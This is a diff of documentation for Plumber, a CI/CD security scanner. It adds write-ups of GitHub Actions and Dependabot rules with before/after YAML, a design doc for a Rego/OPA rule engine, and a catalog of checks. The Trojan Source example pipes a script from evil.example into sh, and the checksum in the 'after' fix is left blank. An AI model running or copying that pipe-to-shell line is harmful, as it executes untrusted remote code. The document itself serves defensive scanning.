+caches, artefacts, deploy targets. On a deploy workflow an older run
+can even overtake a newer one and land stale output.
+
+```yaml
+# β before
+name: Deploy
+on: [push]
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ steps:
+ - run: ./deploy.sh
+```
+
+```yaml
+# β
after β concurrency group scoped by workflow+ref
+name: Deploy
+on: [push]
+concurrency:
+ group: ${{ github.workflow }}-${{ github.ref }}
+ cancel-in-progress: true # set false for production deploys
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ steps:
+ - run: ./deploy.sh
+```
+
+---
+
+## ISSUE-603 β `workflow-misfeature`
+
+**Severity:** `medium` β’ **Control:** `workflowMustNotUseKnownMisfeatures`
+
+`actions/upload-artifact` with `path: .` or
+`path: ${{ github.workspace }}` uploads the whole checkout β including
+`.git/`. Paired with ISSUE-307 (artipacked) this exfiltrates the
+GITHUB_TOKEN; even alone it leaks the full git history.
+
+```yaml
+# β before
+- uses: actions/upload-artifact@v4
+ with:
+ name: workspace
+ path: .
+```
+
+```yaml
+# β
after β upload the build output, nothing else
+- uses: actions/upload-artifact@v4
+ with:
+ name: binaries
+ path: dist/
+```
+
+---
+
+## ISSUE-604 β `workflow-obfuscation`
+
+**Severity:** `high` β’ **Control:** `workflowMustNotContainObfuscation`
+
+The workflow carries invisible Unicode (zero-width spaces U+200BβU+200F,
+bidi overrides U+202AβU+202E, BOM U+FEFF) inside a script, env value or
+action input. The source looks harmless in review while the runner
+executes a different instruction. This is the **Trojan Source**
+attack class (CVE-2021-42574), documented against npm / PyPI packages
+since 2021.
+
+```yaml
+# β before β zero-width space between "curl" and the URL
+# (not visible, but the runner sees it)
+- run: curlβhttps://evil.example/payload.sh | sh
+```
+
+```yaml
+# β
after β pure ASCII, pinned fetch, verified checksum
+- run: |
+ curl -fsSL -o /tmp/payload.sh https://trusted.example/payload.sh
+ echo " /tmp/payload.sh" | sha256sum -c -
+ bash /tmp/payload.sh
+```
+
+A pre-commit hook refusing zero-width / bidi Unicode in source files is
+the sustainable fix.
+
+---
+
+## ISSUE-605 β `use-trusted-publishing`
+
+**Severity:** `high` β’ **Control:** `publishWorkflowsMustUseOidcTrustedPublishing`
+
+Publish to PyPI / npm / Maven Central uses a long-lived static token
+instead of OIDC trusted publishing. Static tokens are reusable from
+anywhere they leak; OIDC tokens are short-lived, scoped to a specific
+repo / workflow / environment.
+
+```yaml
+# β before β static token
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - run: python -m build
+ - uses: pypa/gh-action-pypi-publish@v1
+ with:
+ password: ${{ secrets.PYPI_API_TOKEN }}
+```
+
+```yaml
+# β
after β OIDC, no password: input
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ permissions:
+ id-token: write # required for OIDC
+ contents: read
+ steps:
+ - uses: actions/checkout@v4
+ - run: python -m build
+ - uses: pypa/gh-action-pypi-publish@v1
+```
+
+Configure the matching *trusted publisher* on PyPI project settings
+(for npm, use `--provenance`; for Maven Central, the Sonatype portal's
+trusted publishing flow).
+
+---
+
+## ISSUE-606 β `dependabot-insecure-exec`
+
+**Severity:** `critical` β’ **Control:** `dependabotMustNotAllowInsecureExternalCodeExecution`
+
+`.github/dependabot.yml` sets `insecure-external-code-execution: allow`
+for an ecosystem. Dependabot then runs install / postinstall hooks
+from every candidate version during resolution, giving any compromised
+upstream package direct code execution inside the privileged Dependabot
+runner.
+
+```yaml
+# β before
+version: 2
+updates:
+ - package-ecosystem: npm
+ directory: /
+ schedule: { interval: daily }
+ insecure-external-code-execution: allow
+```
+
+```yaml
+# β
after β default (deny) is the correct value
+version: 2
+updates:
+ - package-ecosystem: npm
+ directory: /
+ schedule: { interval: daily }
+```
+
+---
+
+## ISSUE-607 β `dependabot-missing-cooldown`
+
+**Severity:** `low` β’ **Control:** `dependabotEcosystemsMustHaveCooldown`
+
+An ecosystem in `.github/dependabot.yml` has no `cooldown:` window.
+Dependabot then opens a PR the instant a new upstream version is
+published β including the minute-old release a compromised maintainer
+just pushed. The security-advisory pipeline needs 24β72 h to flag a
+bad release; a cooldown buys that window.
+
+```yaml
+# β before
+version: 2
+updates:
+ - package-ecosystem: npm
+ directory: /
+ schedule: { interval: daily }
+```
+
+```yaml
+# β
after β 3-day default, 7-day window for major bumps
+version: 2
+updates:
+ - package-ecosystem: npm
+ directory: /
+ schedule: { interval: daily }
+ cooldown:
+ default-days: 3
+ semver-major-days: 7
+ include: ["*"]
+```
+
+---
+
+## ISSUE-608 β `dependency-update-tool-missing`
+
+**Severity:** `medium` β’ **Control:** `repositoriesMustConfigureDependencyUpdates`
+
+The repository ships CI/CD workflows but has neither
+`.github/dependabot.yml` nor a Renovate config. Dependency pins β
+third-party action SHAs, container image digests, lockfiles β then
+drift as upstream patches land; every unpatched CVE stays until a
+human remembers to refresh them.
+
+Fix for Dependabot (`.github/dependabot.yml`):
+
+```yaml
+version: 2
+updates:
+ - package-ecosystem: github-actions
+ directory: /
+ schedule: { interval: weekly }
+ cooldown: { default-days: 3, semver-major-days: 7 }
+ - package-ecosystem: npm # or pip / gomod / cargo / β¦
+ directory: /
+ schedule: { interval: weekly }
+```
+
+Alternative: a minimal `renovate.json` at the repo root:
+
+```json
+{
+ "$schema": "https://docs.renovatebot.com/renovate-schema.json",
+ "extends": ["config:recommended"],
+ "pinDigests": true
+}
+```
+
+Either one satisfies the rule.
+
+---
+
+## ISSUE-609 β `sast-workflow-missing`
+
+**Severity:** `low` β’ **Control:** `repositoriesMustRunSAST`
+
+None of the repository's workflows invokes a recognised SAST
+scanner (CodeQL, Semgrep, SonarQube, Trivy config scan, Snyk,
+FOSSA, Bearer, DevSkim, gitleaks, β¦). Static analysis catches
+whole vulnerability classes β injection, unsafe deserialisation,
+crypto misuse β before they reach production; leaving it out of
+CI means the only gate is manual review, which misses regressions
+exactly when the diff is large.
+
+Drop a CodeQL workflow (free for public repos) under
+`.github/workflows/codeql.yml`:
+
+```yaml
+name: CodeQL
+on:
+ push: { branches: [main] }
+ pull_request: { branches: [main] }
+
+permissions:
+ contents: read
+ security-events: write
+
+jobs:
+ analyze:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - uses: github/codeql-action/init@v3
+ with: { languages: go } # or javascript / python / β¦
+ - uses: github/codeql-action/analyze@v3
+```
+
+Semgrep, SonarCloud, Trivy config-scan, Snyk, Bearer all qualify.
+The list is kept broad so the rule does not force a specific
+vendor.
+
+---
+
+## ISSUE-610 β `security-policy-missing`
+
+**Severity:** `low` β’ **Control:** `repositoriesMustPublishSecurityPolicy`
+
+The repository has no `SECURITY.md` (nor `.github/SECURITY.md`,
+nor `docs/SECURITY.md`) documenting the vulnerability disclosure
+process. Researchers who find an issue have no public contact
+beyond opening a GitHub issue β which defeats coordinated
+disclosure and trains them to dump vulnerabilities in the open.
+
+A two-paragraph `SECURITY.md` at the root is enough:
+
+```markdown
+# Security Policy
+
+## Supported versions
+
+The latest minor release and the previous one receive security
+patches. Older releases do not.
+
+## Reporting a vulnerability
+
+Send a private report via GitHub's **Security β Report a
+vulnerability** flow, or email security@example.com. We
+acknowledge within 48 hours and aim for a fix (or a coordinated
+disclosure plan) within 14 days.
+```
+
+GitHub picks up any of the three canonical locations and links
+the policy from the repo landing page and the "Security" tab.
+
+---
+
+## Appendix
+
+### Exit codes
+
+| Code | Meaning |
+| :--- | :--- |
+| `0` | No finding above the threshold |
+| `1` | At least one finding / compliance below threshold |
+| `2` | Runtime error (bad config, missing auth, collector failure) |
+
+### `.plumber.yaml` control names
+
+Each rule's `ControlName` (used with `--controls` / `--skip-controls`
+and in `.plumber.yaml`) is declared in
+[`control/codes.go`](../control/codes.go). A few shortcuts:
+
+| Code | ControlName |
+| :--- | :--- |
+| ISSUE-102 / 103 | `containerImageMustNotUseForbiddenTags` |
+| ISSUE-104 | `actionsMustBePinnedByCommitSha` |
+| ISSUE-107 | `dockerfilesMustPinBaseImageByDigest` |
+| ISSUE-112 | `releaseWorkflowsMustSignArtefacts` |
+| ISSUE-113 | `actionRefsMustNotCollide` |
+| ISSUE-114 | `actionsMustNotCarryKnownCVEs` |
+| ISSUE-115 | `actionsMustNotDuplicateRunnerBuiltins` |
+| ISSUE-213 | `workflowMustNotExportEntireGitHubContext` |
+| ISSUE-214 | `workflowMustPinPackageInstalls` |
+| ISSUE-215 | `workflowMustNotInjectVarsInScripts` |
+| ISSUE-308 | `workflowMustNotIndexSecretsDynamically` |
+| ISSUE-414 / 415 | `workflowMustNotUseDangerousTriggers`, `pullRequestTargetMustNotCheckoutHead` |
+| ISSUE-607 | `dependabotEcosystemsMustHaveCooldown` |
+| ISSUE-608 | `repositoriesMustConfigureDependencyUpdates` |
+| ISSUE-609 | `repositoriesMustRunSAST` |
+| ISSUE-610 | `repositoriesMustPublishSecurityPolicy` |
+
+### API-backed rules
+
+ISSUE-108 / 109 / 110 / 111 / 113 / 114 call the GitHub REST API
+via `github.com/cli/go-gh`, which reuses the locally stored `gh`
+token. Without `gh auth login`, those rules degrade silently (no
+false positives) rather than failing the run.
+
+Disable them explicitly in sealed CI environments with:
+
+```bash
+export PLUMBER_DISABLE_GITHUB_API=1
+```
+
+### JSON output schema
+
+```bash
+plumber analyze --print=false --output findings.json
+```
+
+```json
+{
+ "projectPath": "owner/repo",
+ "ciValid": true,
+ "findings": [
+ {
+ "code": "ISSUE-414",
+ "severity": "critical",
+ "message": "job \"preview\" is reachable via the dangerous trigger \"pull_request_target\"",
+ "job": "pr-preview/preview",
+ "file": ".github/workflows/pr-preview.yml",
+ "line": 13
+ }
+ ]
+}
+```
diff --git a/docs/PBOM.md b/docs/PBOM.md
index 8bc6d57..baa6e0a 100644
--- a/docs/PBOM.md
+++ b/docs/PBOM.md
@@ -74,15 +74,17 @@ The native Plumber PBOM format provides a detailed, pipeline-specific inventory
### Structure
+Top-level keys are emitted in this order (human-readable flow: context β aggregates β score β inventories):
+
```json
{
"pbomVersion": "1.0.0",
"generatedAt": "2026-02-09T15:26:20Z",
"project": { ... },
- "containerImages": [ ... ],
- "includes": [ ... ],
"summary": { ... },
- "plumberScore": { ... }
+ "plumberScore": { ... },
+ "containerImages": [ ... ],
+ "includes": [ ... ]
}
```
@@ -93,10 +95,10 @@ The native Plumber PBOM format provides a detailed, pipeline-specific inventory
| `pbomVersion` | string | PBOM specification version (currently `"1.0.0"`) |
| `generatedAt` | string | ISO 8601 timestamp of generation |
| `project` | object | Information about the analyzed project |
-| `containerImages` | array | All container images used in the pipeline |
-| `includes` | array | All includes (components, templates, local, remote, project) |
| `summary` | object | Aggregate statistics |
| `plumberScore` | object | Optional. Present when `plumber analyze` is run with `--score` and/or `--score-point`. Letter score (AβE), points (0β100), and severity counts (see below). |
+| `containerImages` | array | All container images used in the pipeline |
+| `includes` | array | All includes (components, templates, local, remote, project) |
### `project` Object
@@ -151,14 +153,14 @@ Each entry represents a CI/CD include dependency. Fields vary by include type: o
| `fromCatalog` | bool | Whether it comes from the GitLab CI/CD Catalog. Only for `component` type. |
| `nested` | bool | Whether this is a nested include (included by another include). Only present when `true`. |
| `overridden` | bool | Whether this include's jobs are overridden with forbidden CI/CD keywords. Only present when `true`. |
-| `overriddenJobs` | array | Details of which jobs are overridden and with which keywords. Only present when `overridden` is `true`. |
+| `overriddenJobs` | array | Details of which jobs are overridden and with which keywords. Only present when `overridden` is `true`. JSON uses camelCase (`overriddenJobs`, `overriddenKeys`), not snake_case. |
Each entry in `overriddenJobs[]`:
| Field | Type | Description |
|-------|------|-------------|
| `jobName` | string | Name of the overridden job |
-| `overriddenKeys` | string[] | Forbidden CI/CD keywords found in the override (e.g., `script`, `image`, `rules`) |
+| `overriddenKeys` | string[] | CI/CD job keys redefined locally on top of the upstream include (the same βforbidden overrideβ keywords Plumber uses for compliance, e.g., `script`, `image`, `rules`) |
**Example (component):**
@@ -259,8 +261,8 @@ When `plumber analyze` is run with `--score` and/or `--score-point`, the BOM inc
{
"bomFormat": "CycloneDX",
"specVersion": "1.5",
- "serialNumber": "urn:uuid:...",
"version": 1,
+ "serialNumber": "urn:uuid:...",
"metadata": { ... },
"components": [ ... ]
}
@@ -272,8 +274,8 @@ When `plumber analyze` is run with `--score` and/or `--score-point`, the BOM inc
|-------|------|-------------|
| `bomFormat` | string | Always `"CycloneDX"` |
| `specVersion` | string | CycloneDX spec version (`"1.5"`) |
-| `serialNumber` | string | Unique BOM identifier (URN UUID) |
| `version` | number | BOM version (always `1`) |
+| `serialNumber` | string | Unique BOM identifier (URN UUID) |
| `metadata` | object | BOM metadata (timestamp, tool, subject) |
| `components` | array | All pipeline components |
diff --git a/docs/REFACTOR_MULTI_PROVIDER.md b/docs/REFACTOR_MULTI_PROVIDER.md
new file mode 100644
index 0000000..8fb72db
--- /dev/null
+++ b/docs/REFACTOR_MULTI_PROVIDER.md
@@ -0,0 +1,394 @@
+# Multi-Provider Refactor β Rego/OPA Rule Engine
+
+> **Status:** Phases 0, 1, 2 and 4 complete (2026-04-23). Multi-provider plumbing validated: the same `image_mutable_tag` Rego policy runs unchanged against both the GitLab lab (solution/lab-12) and the GitHub lab (plumber-tests/lab-github-cicd). Next up: Phase 5 (more provider-specific rules).
+> **Owner:** StΓ©phane Robert
+> **Last updated:** 2026-04-23
+
+This document is the working reference for the on-going refactor of Plumber
+from a GitLab-only, Go-hardcoded rule engine toward a **multi-provider scanner
+driven by Rego/OPA policies**. It is meant to be read by contributors (human
+or AI) continuing the work across sessions.
+
+---
+
+## 1. Goals
+
+1. **Support multiple CI/CD providers**: GitLab (current), GitHub Actions,
+ and β later β Azure DevOps, Gitea, Bitbucket Pipelines.
+2. **Replace the hardcoded Go control engine** with a Rego/OPA-based engine
+ where each rule is a declarative policy file.
+3. **Keep rules portable across providers** where the concept applies
+ (mutable image tags, weakened security jobs, debug trace, DinDβ¦).
+4. **Let users add their own rules** without recompiling Plumber.
+5. **Preserve the current UX**: same CLI, same JSON output shape (or a
+ documented, versioned migration path).
+
+## 2. Non-goals
+
+- Replacing OPA with a home-grown DSL. OPA/Rego is a deliberate choice for
+ ecosystem reasons (Conftest, Styra, tooling, learnability).
+- Rewriting the GitLab API collector. It stays; only the rule-evaluation
+ layer is rewritten.
+- Scanning arbitrary YAML or Terraform. Scope stays on CI/CD pipelines.
+
+## 3. Current architecture (as-is)
+
+```text
+cmd/analyze.go
+ β
+ βΌ
+collector/* β fetches & parses GitLab CI (API + local YAML)
+ β
+ βΌ
+control/controlGitlab*.go β ~15 hardcoded Go controls, each with typed result
+ β
+ βΌ
+AnalysisResult (control/types.go)
+```
+
+Pain points:
+
+- Each rule = one Go file + its own result type + its own test suite.
+- Every new rule requires a new release.
+- No way for a user to contribute a rule without touching Go code.
+- Multi-provider would currently mean duplicating all rules per provider.
+
+## 4. Target architecture (to-be)
+
+```text
+ ββββββββββββββββββββββββββββββββββββββββ
+ cmd/analyze β β Provider collectors (loaders) β
+ β - gitlab/ (existing, adapted) β
+ β - github/ (new) β
+ β - azure/ (later) β
+ ββββββββββββββββββββ¬ββββββββββββββββββββ
+ β produces
+ βΌ
+ ββββββββββββββββββββββββββββββββββββββββ
+ β Normalized IR (internal/ir) β
+ β NormalizedPipeline { β
+ β Provider, Jobs[]{ β
+ β Image, Script[], Services[], β
+ β AllowFailure, When, Rules, β¦ β
+ β }, β
+ β Includes[], Branches[], β¦ β
+ β } β
+ ββββββββββββββββββββ¬ββββββββββββββββββββ
+ β evaluated by
+ βΌ
+ ββββββββββββββββββββββββββββββββββββββββ
+ β OPA engine (internal/engine/opa) β
+ β - embeds built-in policies β
+ β - loads user policies from path β
+ β - namespaces: data.plumber.{rule} β
+ ββββββββββββββββββββ¬ββββββββββββββββββββ
+ β emits
+ βΌ
+ ββββββββββββββββββββββββββββββββββββββββ
+ β Findings[] β existing reporter β
+ β (PBOM, JSON, terminal, MR comment) β
+ ββββββββββββββββββββββββββββββββββββββββ
+```
+
+Key properties:
+
+- **Collectors** are provider-specific and do all I/O (API calls, YAML
+ parsing, include resolution, version lookups). They emit the IR.
+- **IR** is the single input format for all policies.
+- **Policies** are `.rego` files grouped by concern, not by provider.
+ A policy like `image_mutable_tag.rego` runs against any IR regardless of
+ origin.
+- **Engine** wraps OPA, handles policy discovery (embedded + user dir),
+ catalog of rule metadata (severity, code, remediation link).
+
+## 5. Normalized IR β first sketch
+
+```go
+// internal/ir/pipeline.go (to be created)
+
+type Provider string
+
+const (
+ ProviderGitLab Provider = "gitlab"
+ ProviderGitHub Provider = "github"
+)
+
+type NormalizedPipeline struct {
+ Provider Provider
+ ProjectPath string
+ DefaultBranch string
+ Jobs []Job
+ Includes []Include
+ Branches []Branch
+ Raw map[string]any // provider-specific escape hatch
+}
+
+type Job struct {
+ Name string
+ Image *Image
+ Services []Image
+ Scripts []string
+ AllowFailure bool
+ When string // "on_success", "manual", "never", β¦
+ Rules []Rule
+ Variables map[string]string
+ OriginFile string // file where the job is declared
+ OriginKind string // "local", "remote", "component", "template"β¦
+}
+
+type Image struct {
+ Name string
+ Tag string
+ Digest string // empty if not pinned
+}
+
+type Include struct {
+ Kind string // "local", "remote", "component", "template", "project"
+ Ref string // version/ref if applicable
+ Source string
+ Current string // fetched "latest" ref for freshness checks (nullable)
+}
+```
+
+The GitHub collector maps `jobs..runs-on`, `uses`, `with`, `container`
+etc. to the same shape. The IR stays **lossy on purpose**: what doesn't fit
+goes into `Raw` and can be used by provider-specific policies.
+
+## 6. Policy layout β first sketch
+
+```text
+policies/
+βββ lib/
+β βββ image.rego # helpers: parse_image(), is_mutable_tag()
+β βββ job.rego # helpers: is_security_scanner(), is_weakened()
+βββ image/
+β βββ mutable_tag.rego
+β βββ untrusted_registry.rego
+β βββ pinned_by_digest.rego
+βββ pipeline/
+β βββ debug_trace.rego
+β βββ docker_in_docker.rego
+β βββ variable_injection.rego
+β βββ unverified_scripts.rego
+β βββ hardcoded_jobs.rego
+βββ security/
+β βββ weakened_scanners.rego
+βββ origin/
+ βββ outdated_includes.rego
+ βββ forbidden_versions.rego
+```
+
+Every policy emits findings in a uniform shape:
+
+```rego
+package plumber.image.mutable_tag
+
+import rego.v1
+
+deny contains finding if {
+ job := input.jobs[_]
+ job.image.tag in {"latest", "dev", "master", "main"}
+ finding := {
+ "code": "IMG-001",
+ "severity": "high",
+ "message": sprintf("job %q uses mutable tag %q", [job.name, job.image.tag]),
+ "job": job.name,
+ "file": job.origin_file,
+ }
+}
+```
+
+A Go-side schema validates and enriches findings (severity catalog,
+remediation URL, CWE referencesβ¦) before they flow into the existing
+reporter.
+
+## 7. Design decisions (validated 2026-04-23)
+
+
+| # | Decision | Chosen option |
+| -- | ---------------------------- | ------------- |
+| D1 | **IR scope** | **Minimal shared IR + `Raw` escape hatch per provider.** Extend as concrete rules demand it β not in advance. |
+| D2 | **Policy packaging** | **`//go:embed` built-in policies + optional user directory via `--policies`.** The binary is self-contained; users can extend or override without recompiling. |
+| D3 | **Initial provider targets** | **GitLab (adapt existing collector) + GitHub Actions (new collector).** Gitea, Azure DevOps, Bitbucket Pipelines, and Dagger are explicitly out of scope for v1 and will be considered after the first stable release. |
+| D4 | **Hybrid period** | **Rule-by-rule port.** Each Go control is replaced by its Rego equivalent behind a feature flag, parity is verified against integration fixtures, then the Go path is removed. No big-bang cutover. |
+| D5 | **Output compatibility** | **Deprecate-in-place.** A new `findings[]` field is added to `AnalysisResult`. Legacy per-control fields are kept for 1β2 minor versions with a deprecation warning in the JSON output, then removed in a documented minor release. |
+
+
+## 8. Migration plan
+
+### Phase 0 β preparation (no behavior change) β DONE
+
+- [x] Validate open decisions Β§7 with maintainers.
+- [x] Open a tracking issue (required by `AI_POLICY.md`). β [#148](https://github.com/getplumber/plumber/issues/148)
+- [x] Add `github.com/open-policy-agent/opa` to `go.mod`.
+- [x] Create `internal/ir/` and `internal/engine/opa/` skeletons.
+
+### Phase 1 β IR + engine alongside existing controls β DONE
+
+- [x] Define `NormalizedPipeline` and the minimal `Job`/`Image`/`Include` types.
+- [x] Write a GitLab IR mapper from the existing `collector` output (`collector.ToNormalizedPipeline`).
+- [x] Build the OPA engine: load embedded policies, evaluate, emit findings.
+- [x] Unit-test the engine with a fake IR + one dummy policy.
+- [x] Gate the engine behind `engine.enabled` (default off) with parity checks against `lab-gitlab-cicd` (branch `solution/lab-12`).
+
+### Phase 2 β port one rule end-to-end
+
+- [ ] Pick the simplest rule (proposal: `image/mutable_tag`).
+- [ ] Write the Rego policy + fixtures.
+- [ ] Wire a feature flag so the rule runs via Rego, not Go.
+- [ ] Verify JSON output is identical to the Go version on the integration fixtures.
+
+### Phase 3 β port remaining GitLab rules β DONE
+
+- [x] Incrementally migrate each of the ~15 controls.
+ ISSUE-{101,102,103,203,204,205,401,403,404,410,411,412,413,501,505}
+ plus required components/templates ISSUE-{405,406,408,409}.
+- [ ] Remove Go controls as each Rego equivalent reaches parity.
+- [x] Keep tests green at every step.
+
+### Phase 4 β GitHub Actions provider β DONE
+
+- [x] New collector (`collector/github_workflows.go`, local-only MVP β no GitHub API needed).
+- [x] GitHub β IR mapper (`ScanGitHubWorkflows` emits `ir.NormalizedPipeline`).
+- [x] Run existing `image_mutable_tag` policy against `../lab-github-cicd` GitHub fixture with zero changes to the Rego.
+- [x] CLI auto-dispatches on `github.com` remote; `runGitHubAnalyze` is Rego-only, no `GITLAB_TOKEN` required.
+- [ ] Provider-specific policies (Phase 5+: `excessive-permissions`, `dangerous-triggers`, `template-injection`, β¦ β see Β§11).
+
+### Phase 5 β documentation & DX
+
+- [ ] User docs for writing a custom policy.
+- [ ] `plumber policy test` command (wrapper around `opa test`).
+- [ ] Update `README`, `CONTRIBUTING`, website.
+
+## 9. Risks & mitigations
+
+
+| Risk | Mitigation |
+| ----------------------------------------------- | ---------- |
+| Rego can't fetch (API calls during evaluation) | Collector enriches the IR *before* OPA runs (e.g. pre-fetch latest include refs). |
+| Performance regression on large pipelines | Benchmark before/after in Phase 2; keep Go path behind feature flag until benchmarks pass. |
+| Breaking JSON output for existing users | Keep legacy fields, add new ones; document migration. |
+| Policy explosion / unmaintainable Rego | Shared `lib/` helpers; `opa test` coverage; lint in CI. |
+| Scope creep (Terraform, K8sβ¦) | Explicit non-goal Β§2. Reject in reviews. |
+
+
+## 10. AI contribution notes
+
+This refactor is expected to involve Claude Code (see `AI_POLICY.md`).
+All AI-assisted PRs **must**:
+
+- Reference the tracking issue for this refactor (to be opened in Phase 0).
+- Be fully reviewed and verified by a human before merge.
+- Disclose AI usage in the PR description.
+
+## 11. Catalog of GitHub Actions security checks
+
+The following rule catalog drives the Rego policies Plumber ships for
+GitHub Actions workflows. Each check has a stable identifier used as
+its Rego package name and Rego module file name (e.g. `excessive-permissions`
+β `policies/excessive_permissions.rego`). Fixture YAMLs live under
+`policies/testdata/ISSUE-XXX/github/`.
+
+Status legend: **done** β policy ported and tested; **planned** β to port.
+
+### Supply chain & action references
+
+
+| Check | Detects | Status |
+| ----------------------------------- | ------------------------------------------------------------------ | -------- |
+| `unpinned-uses` (ISSUE-104) | `uses: owner/action@v4` instead of hash-pinned references | **done** |
+| `cache-poisoning` (ISSUE-106) | Release/publish job restores a non-ref-scoped build cache | **done** |
+| `archived-uses` (ISSUE-108) | Actions hosted in an archived repository | **done** |
+| `impostor-commit` (ISSUE-109) | Commit SHA that does not belong to the declared upstream repo | **done** |
+| `ref-version-mismatch` (ISSUE-110) | Hash-pinned action with a misleading `# vX.Y.Z` comment | **done** |
+| `stale-action-refs` (ISSUE-111) | Action pin is behind the latest upstream release | **done** |
+| `ref-confusion` (ISSUE-113) | Symbolic refs that are ambiguous (branch vs tag collision) | **done** |
+| `known-vulnerable-actions` (ISSUE-114) | Action versions with published GHSA advisories | **done** |
+| `superfluous-actions` (ISSUE-115) | Third-party actions duplicating runner built-ins | **done** |
+
+
+### Container images
+
+
+| Check | Detects | Status |
+| ----------------------------------- | ------------------------------------------------------------------ | -------- |
+| `unpinned-images` (ISSUE-102) | Mutable container tags (`:latest`, `:dev`, glob patterns) | **done** |
+| `image-pinned-by-digest` (ISSUE-103) | Container images must be pinned by immutable digest (@sha256:β¦) | **done** |
+| `hardcoded-container-credentials` (ISSUE-105) | Registry password literals in `container.credentials` | **done** |
+
+
+### Triggers & inputs
+
+
+| Check | Detects | Status |
+| ----------------------------------- | ------------------------------------------------------------------ | -------- |
+| `dangerous-triggers` (ISSUE-414) | `pull_request_target`, `workflow_run` with unsafe code checkout | **done** |
+| `pull-request-target-with-head-checkout` (ISSUE-415) | Explicit PR-head checkout under `pull_request_target` (CVE-2025-30066 pattern) | **done** |
+| `template-injection` (ISSUE-206) | User input rendered into `run:` via `${{ github.event.* }}` | **done** |
+| `bot-conditions` (ISSUE-210) | Spoofable `github.actor == 'dependabot[bot]'` checks | **done** |
+| `unsound-condition` (ISSUE-211) | Logically unsound conditional expressions | **done** |
+| `unsound-contains` (ISSUE-212) | Misused `contains()` built-in | **done** |
+
+
+### Permissions & secrets
+
+
+| Check | Detects | Status |
+| ----------------------------------- | ------------------------------------------------------------------ | -------- |
+| `excessive-permissions` (ISSUE-509) | Blanket `permissions: write-all` | **done** |
+| `undocumented-permissions` (ISSUE-304) | Workflow runs with no explicit `permissions:` block | **done** |
+| `overprovisioned-secrets` (ISSUE-301) | Entire `secrets` context exported via `toJson(secrets)` | **done** |
+| `secrets-outside-env` (ISSUE-305) | Deploy/publish job uses secrets without `environment:` gate | **done** |
+| `unredacted-secrets` (ISSUE-303) | `fromJSON(secrets.X).y` bypasses automatic log redaction | **done** |
+| `secrets-inherit` (ISSUE-302) | Reusable workflow called with `secrets: inherit` | **done** |
+| `github-app` (ISSUE-306) | GitHub App token issued with `skip-token-revoke: true` | **done** |
+| `github-env` (ISSUE-209) | Untrusted writes to `GITHUB_ENV` / `GITHUB_PATH` | **done** |
+| `artipacked` (ISSUE-307) | `actions/checkout` without `persist-credentials: false` | **done** |
+
+
+### Workflow hygiene
+
+
+| Check | Detects | Status |
+| ----------------------------------- | ------------------------------------------------------------------ | -------- |
+| `anonymous-definition` (ISSUE-601) | Workflow or action without a `name:` field | **done** |
+| `concurrency-limits` (ISSUE-602) | Missing `concurrency` block with `cancel-in-progress` | **done** |
+| `insecure-commands` (ISSUE-208) | `ACTIONS_ALLOW_UNSECURE_COMMANDS: true` | **done** |
+| `cache-poisoning` (ISSUE-106) | `actions/cache` used inside a release workflow | **done** |
+| `use-trusted-publishing` (ISSUE-605) | PyPI/npm publish via static token instead of OIDC | **done** |
+| `misfeature` (ISSUE-603) | Upload-artifact of the checkout directory (leaks `.git/`) | **done** |
+| `obfuscation` (ISSUE-604) | Zero-width / bidirectional Unicode in scripts and inputs | **done** |
+
+
+### Dependabot
+
+
+| Check | Detects | Status |
+| ----------------------------------- | ------------------------------------------------------------------ | -------- |
+| `dependabot-execution` (ISSUE-606) | `insecure-external-code-execution: allow` | **done** |
+| `dependabot-cooldown` (ISSUE-607) | Missing `cooldown:` window in `.github/dependabot.yml` | **done** |
+
+
+### Repository-hygiene checks
+
+Rules that extend the audit surface from the workflow YAML to the
+surrounding repository artefacts β Dockerfiles, SECURITY.md,
+dependency-update configs, release-signing steps β and to
+injection patterns not covered by the original template-injection
+family.
+
+
+| Check | Detects | Status |
+| --------------------------------------- | ---------------------------------------------------------------------------------------------------------------------- | -------- |
+| `unsafe-github-context-dump` (ISSUE-213) | `toJson(github)` / `toJson(github.event)` piped into a script / env / input | **done** |
+| `unpinned-package-install` (ISSUE-214) | `pip install X` / `npm install X` without version pin or lockfile | **done** |
+| `release-workflow-unsigned` (ISSUE-112) | Release / publish job produces artefacts without any signing step (cosign, sigstore, GPG) | **done** |
+| `dockerfile-unpinned-base` (ISSUE-107) | `FROM image:tag` in a repo Dockerfile without `@sha256:` digest | **done** |
+| `dependency-update-tool-missing` (ISSUE-608) | Repository ships workflows but neither Dependabot nor Renovate is configured | **done** |
+| `sast-workflow-missing` (ISSUE-609) | No workflow runs a recognised SAST scanner (CodeQL, Semgrep, SonarQube, Trivy, Snyk, β¦) | **done** |
+| `security-policy-missing` (ISSUE-610) | Repository ships workflows but no SECURITY.md disclosure policy | **done** |
+
+
+A matching fixture project lives in `../lab-github-cicd/` (outside the
+Plumber repository) so every planned check has a real workflow to run
+against during development.
diff --git a/docs/scoring.md b/docs/scoring.md
index a203650..7ed8dc1 100644
--- a/docs/scoring.md
+++ b/docs/scoring.md
@@ -68,7 +68,6 @@ L_uncapped = w Γ (1 + 0.5 Γ log2(n))
**Why caps?** So one severity bucket cannot erase the entire scale on its own. Critical stays uncapped on purpose so stacking Critical issues keeps hurting, though the malus in Step 3 already forces the letter into the **E** band.
-
---
## Step 2: Raw points
diff --git a/go.mod b/go.mod
index 2d55730..e6b6ff1 100644
--- a/go.mod
+++ b/go.mod
@@ -5,34 +5,75 @@ go 1.25.0
require (
github.com/AlecAivazis/survey/v2 v2.3.7
github.com/IGLOU-EU/go-wildcard/v2 v2.1.0
+ github.com/charmbracelet/lipgloss v1.1.1-0.20250319133953-166f707985bc
+ github.com/cli/go-gh/v2 v2.13.0
github.com/google/uuid v1.6.0
- github.com/hashicorp/go-version v1.9.0
+ github.com/hashicorp/go-version v1.8.0
github.com/machinebox/graphql v0.2.2
+ github.com/open-policy-agent/opa v1.15.2
+ github.com/schollz/progressbar/v3 v3.19.0
github.com/sirupsen/logrus v1.9.4
- github.com/spf13/cobra v1.8.1
- gitlab.com/gitlab-org/api/client-go v1.46.0
- golang.org/x/term v0.42.0
+ github.com/spf13/cobra v1.10.2
+ gitlab.com/gitlab-org/api/client-go v1.13.0
+ golang.org/x/term v0.40.0
gopkg.in/yaml.v2 v2.4.0
)
require (
- github.com/google/go-cmp v0.7.0 // indirect
